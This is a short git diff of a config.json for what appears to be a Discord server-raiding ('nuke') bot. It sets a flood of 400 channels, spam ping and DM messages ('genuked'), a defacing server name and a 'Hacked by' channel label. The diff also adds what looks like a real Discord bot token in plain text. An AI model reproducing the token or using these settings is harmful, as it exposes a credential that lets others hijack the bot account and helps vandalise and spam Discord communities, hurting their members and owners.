--- a/src/config.json
+++ b/src/config.json
@@ -1,10 +1,10 @@
 {
-    "token":"TOKEN",
-    "channelName": "Hacked by Hiroshi",
+    "token":"OTU2NDIwODE4MzgzMDI0MTU4.Yjv-TA.ZAzb5GgeG1qvTs91RdRP-1st9_k",
+    "channelName": "lucr war hier",
     "channelAmount": "400",
-    "pingMessage": "",
+    "pingMessage": "sui",
     "avatarURL": "",
     "botName": "Hiroshi",
-    "dmMessage": "",
-    "newServerName": ""
+    "dmMessage": "genuked",
+    "newServerName": "lucros welt"
 }
